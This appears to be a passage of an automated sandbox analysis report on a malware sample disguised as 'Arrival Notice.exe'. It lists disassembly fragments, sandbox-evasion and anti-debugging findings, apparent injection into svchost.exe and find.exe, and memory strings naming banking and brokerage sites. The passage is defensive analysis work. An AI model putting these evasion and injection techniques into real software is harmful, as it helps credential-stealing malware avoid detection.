Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00414CE0 push edi; retf	7_2_00414D09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040D49F push esp; iretd	7_2_0040D4AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401546 push ecx; ret	7_2_00401548
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041466D push ss; iretd	7_2_0041466E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004167C7 push esi; retf	7_2_004167CE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0380225F pushad ; ret	7_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038027FA pushad ; ret	7_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038309AD push ecx; mov dword ptr [esp], ecx	7_2_038309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0380283D push eax; iretd	7_2_03802858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03801368 push eax; iretd	7_2_03801369
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F109AD push ecx; mov dword ptr [esp], ecx	10_2_02F109B6
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02553304 push esi; retf	10_2_0255330B
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_0255C0A4 pushfd ; iretd	10_2_0255C0A5
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_0255C756 push edi; retf	10_2_0255C76C
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_0255B763 push eax; iretd	10_2_0255B764
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_0255181D push edi; retf	10_2_02551846
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02559E5C push esi; retf	10_2_02559E5D
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02563DA0 push esi; ret	10_2_02563E49
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02DC5162 push eax; ret	10_2_02DC5164
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02DB66BB push esi; retf	10_2_02DB66BC
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02DBC7C2 push edi; retf	10_2_02DBC804
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02DBC796 push edi; retf	10_2_02DBC804

Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_0047A330
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00434418

Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Arrival Notice.exe	API/Special instruction interceptor: Address: 3C6326C
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0387096E rdtsc

7_2_0387096E

Source: C:\Windows\SysWOW64\find.exe

Window / User API: threadDelayed 9826

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-87573

Source: C:\Users\user\Desktop\Arrival Notice.exe	API coverage: 3.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\find.exe	API coverage: 2.9 %

Source: C:\Windows\SysWOW64\find.exe TID: 2196	Thread sleep count: 147 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe TID: 2196	Thread sleep time: -294000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe TID: 2196	Thread sleep count: 9826 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe TID: 2196	Thread sleep time: -19652000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe TID: 3824	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe TID: 3824	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe TID: 3824	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe TID: 3824	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe TID: 3824	Thread sleep time: -42000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\find.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\find.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004339B6
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452492
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442886
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_004788BD
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,	0_2_0045CAFA
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00431A86
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD27
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0045DE8F FindFirstFileW,FindClose,	0_2_0045DE8F
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8B
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_0255C620 FindFirstFileW,FindNextFileW,FindClose,	10_2_0255C620

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,

0_2_0040E500

Source: 122-fVJ8.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 122-fVJ8.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 122-fVJ8.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 122-fVJ8.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 122-fVJ8.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 122-fVJ8.10.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 122-fVJ8.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 122-fVJ8.10.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 122-fVJ8.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 122-fVJ8.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 122-fVJ8.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 122-fVJ8.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 122-fVJ8.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 122-fVJ8.10.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 122-fVJ8.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 122-fVJ8.10.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: find.exe, 0000000A.00000002.3749879419.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.1810322903.000001E41AD6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: fXkDwRWxFFQGfp.exe, 0000000C.00000002.3753989411.000000000123F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: 122-fVJ8.10.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: 122-fVJ8.10.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 122-fVJ8.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 122-fVJ8.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 122-fVJ8.10.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 122-fVJ8.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 122-fVJ8.10.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 122-fVJ8.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 122-fVJ8.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 122-fVJ8.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 122-fVJ8.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 122-fVJ8.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 122-fVJ8.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 122-fVJ8.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 122-fVJ8.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\Arrival Notice.exe

API call chain: ExitProcess graph end node

graph_0-86667

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0387096E rdtsc

7_2_0387096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_00417AA3 LdrLoadDll,

7_2_00417AA3

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0045A370 BlockInput,

0_2_0045A370

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

0_2_0040D590

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,

0_2_0040EBD0

Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_03C63538 mov eax, dword ptr fs:[00000030h]	0_2_03C63538
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_03C634D8 mov eax, dword ptr fs:[00000030h]	0_2_03C634D8
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_03C61EB8 mov eax, dword ptr fs:[00000030h]	0_2_03C61EB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382E388 mov eax, dword ptr fs:[00000030h]	7_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382E388 mov eax, dword ptr fs:[00000030h]	7_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382E388 mov eax, dword ptr fs:[00000030h]	7_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385438F mov eax, dword ptr fs:[00000030h]	7_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385438F mov eax, dword ptr fs:[00000030h]	7_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03828397 mov eax, dword ptr fs:[00000030h]	7_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03828397 mov eax, dword ptr fs:[00000030h]	7_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03828397 mov eax, dword ptr fs:[00000030h]	7_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038EC3CD mov eax, dword ptr fs:[00000030h]	7_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038383C0 mov eax, dword ptr fs:[00000030h]	7_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038383C0 mov eax, dword ptr fs:[00000030h]	7_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038383C0 mov eax, dword ptr fs:[00000030h]	7_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038383C0 mov eax, dword ptr fs:[00000030h]	7_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B63C0 mov eax, dword ptr fs:[00000030h]	7_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE3DB mov eax, dword ptr fs:[00000030h]	7_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE3DB mov eax, dword ptr fs:[00000030h]	7_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE3DB mov ecx, dword ptr fs:[00000030h]	7_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DE3DB mov eax, dword ptr fs:[00000030h]	7_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D43D4 mov eax, dword ptr fs:[00000030h]	7_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D43D4 mov eax, dword ptr fs:[00000030h]	7_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]	7_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]	7_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]	7_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]	7_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]	7_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]	7_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]	7_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038403E9 mov eax, dword ptr fs:[00000030h]	7_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038663FF mov eax, dword ptr fs:[00000030h]	7_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386A30B mov eax, dword ptr fs:[00000030h]	7_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386A30B mov eax, dword ptr fs:[00000030h]	7_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386A30B mov eax, dword ptr fs:[00000030h]	7_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382C310 mov ecx, dword ptr fs:[00000030h]	7_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03850310 mov ecx, dword ptr fs:[00000030h]	7_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B2349 mov eax, dword ptr fs:[00000030h]	7_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B035C mov eax, dword ptr fs:[00000030h]	7_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B035C mov eax, dword ptr fs:[00000030h]	7_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B035C mov eax, dword ptr fs:[00000030h]	7_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B035C mov ecx, dword ptr fs:[00000030h]	7_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B035C mov eax, dword ptr fs:[00000030h]	7_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B035C mov eax, dword ptr fs:[00000030h]	7_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FA352 mov eax, dword ptr fs:[00000030h]	7_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D8350 mov ecx, dword ptr fs:[00000030h]	7_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D437C mov eax, dword ptr fs:[00000030h]	7_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E284 mov eax, dword ptr fs:[00000030h]	7_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E284 mov eax, dword ptr fs:[00000030h]	7_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B0283 mov eax, dword ptr fs:[00000030h]	7_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B0283 mov eax, dword ptr fs:[00000030h]	7_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B0283 mov eax, dword ptr fs:[00000030h]	7_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038402A0 mov eax, dword ptr fs:[00000030h]	7_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038402A0 mov eax, dword ptr fs:[00000030h]	7_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C62A0 mov eax, dword ptr fs:[00000030h]	7_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C62A0 mov ecx, dword ptr fs:[00000030h]	7_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C62A0 mov eax, dword ptr fs:[00000030h]	7_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C62A0 mov eax, dword ptr fs:[00000030h]	7_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C62A0 mov eax, dword ptr fs:[00000030h]	7_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C62A0 mov eax, dword ptr fs:[00000030h]	7_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038402E1 mov eax, dword ptr fs:[00000030h]	7_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038402E1 mov eax, dword ptr fs:[00000030h]	7_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038402E1 mov eax, dword ptr fs:[00000030h]	7_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382823B mov eax, dword ptr fs:[00000030h]	7_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B8243 mov eax, dword ptr fs:[00000030h]	7_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B8243 mov ecx, dword ptr fs:[00000030h]	7_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382A250 mov eax, dword ptr fs:[00000030h]	7_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03836259 mov eax, dword ptr fs:[00000030h]	7_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038EA250 mov eax, dword ptr fs:[00000030h]	7_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038EA250 mov eax, dword ptr fs:[00000030h]	7_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03834260 mov eax, dword ptr fs:[00000030h]	7_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03834260 mov eax, dword ptr fs:[00000030h]	7_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03834260 mov eax, dword ptr fs:[00000030h]	7_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382826B mov eax, dword ptr fs:[00000030h]	7_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274 mov eax, dword ptr fs:[00000030h]	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03870185 mov eax, dword ptr fs:[00000030h]	7_2_03870185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038EC188 mov eax, dword ptr fs:[00000030h]	7_2_038EC188
